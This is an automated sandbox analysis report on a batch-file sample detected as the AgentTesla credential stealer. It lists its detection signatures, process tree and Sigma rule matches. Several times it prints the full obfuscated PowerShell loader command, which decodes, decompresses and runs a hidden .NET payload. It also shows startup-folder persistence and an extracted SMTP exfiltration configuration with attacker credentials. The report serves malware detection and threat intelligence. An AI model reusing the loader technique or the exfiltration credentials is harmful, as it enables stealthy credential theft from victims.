Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
87M9Y3P4Z7.bat

Overview

General Information

Sample name:87M9Y3P4Z7.bat
renamed because original name is a hash value
Original sample name:5be496e81c311cc8c78b7d6422fb51e4b4fc3e332ef54eae2bc6495dac60acc7.bat
Analysis ID:1545585
MD5:0403cb08cd9a055952e1153dfd5a2e0e
SHA1:b42d3e9e49a30671d54217268ae15e6c23b0f226
SHA256:5be496e81c311cc8c78b7d6422fb51e4b4fc3e332ef54eae2bc6495dac60acc7
Tags:AgentTeslabatuser-NDA0E
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops VBS files to the startup folder
Found large BAT file
Installs a global keyboard hook
Powershell is started from unusual location (likely to bypass HIPS)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 5448 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\87M9Y3P4Z7.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chcp.com (PID: 5368 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
    • cmd.exe (PID: 5492 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo F " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • xcopy.exe (PID: 6968 cmdline: xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe MD5: 39FBFD3AF58238C6F9D4D408C9251FF5)
    • attrib.exe (PID: 6516 cmdline: attrib +s +h C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • 87M9Y3P4Z7.bat.Zhe (PID: 5128 cmdline: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • InstallUtil.exe (PID: 6196 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 5632 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 6968 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ChannelUris.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 2100 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 6480 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo F " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • xcopy.exe (PID: 2420 cmdline: xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe MD5: 39FBFD3AF58238C6F9D4D408C9251FF5)
      • attrib.exe (PID: 2656 cmdline: attrib +s +h C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • ChannelUris.bat.Zhe (PID: 4892 cmdline: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\AppData\Roaming\ChannelUris.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • InstallUtil.exe (PID: 5092 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "nffplp.com", "Username": "airlet@nffplp.com", "Password": "$Nke%8XIIDtm"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2410949006.0000000000382000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000008.00000002.2410949006.0000000000382000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000007.00000002.2288766679.0000000008820000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 32 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.87M9Y3P4Z7.bat.Zhe.8820000.12.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              19.2.ChannelUris.bat.Zhe.6ea90f0.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                19.2.ChannelUris.bat.Zhe.6ea90f0.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  19.2.ChannelUris.bat.Zhe.6ea90f0.3.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x322ef:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x32361:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x323eb:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x3247d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x324e7:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x32559:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x325ef:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3267f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 20 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Base64 Encoded PowerShell Command Detected
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine|base64offset|contains: hv)^, Image: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe, NewProcessName: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe, OriginalFileName: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\87M9Y3P4Z7.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5448, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", ProcessId: 5128, ProcessName: 87M9Y3P4Z7.bat.Zhe
                    Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine|base64offset|contains: hv)^, Image: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe, NewProcessName: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe, OriginalFileName: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\87M9Y3P4Z7.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5448, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", ProcessId: 5128, ProcessName: 87M9Y3P4Z7.bat.Zhe
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs" , ProcessId: 5632, ProcessName: wscript.exe
                    Sigma detected: Execution of Suspicious File Type Extension
                    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine|base64offset|contains: hv)^, Image: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe, NewProcessName: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe, OriginalFileName: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\87M9Y3P4Z7.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5448, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", ProcessId: 5128, ProcessName: 87M9Y3P4Z7.bat.Zhe
                    Sigma detected: Gzip Archive Decode Via PowerShell
                    Source: Process startedAuthor: Hieu Tran: Data: Command: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine|base64offset|contains: hv)^, Image: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe, NewProcessName: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe, OriginalFileName: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\87M9Y3P4Z7.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5448, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' | Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", ProcessId: 5128, ProcessName: 87M9Y3P4Z7.bat.Zhe
                    Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe, ProcessId: 5128, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ktqy3wn.ooi.ps1
                    Sigma detected: Suspicious Copy From or To System Directory
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe, CommandLine: xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\xcopy.exe, NewProcessName: C:\Windows\System32\xcopy.exe, OriginalFileName: C:\Windows\System32\xcopy.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\87M9Y3P4Z7.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5448, ParentProcessName: cmd.exe, ProcessCommandLine: xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe, ProcessId: 6968, ProcessName: xcopy.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 163.44.198.71, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 6196, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49757
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs" , ProcessId: 5632, ProcessName: wscript.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe, ProcessId: 5128, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs

                    Suricata Signatures

                    No Suricata rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
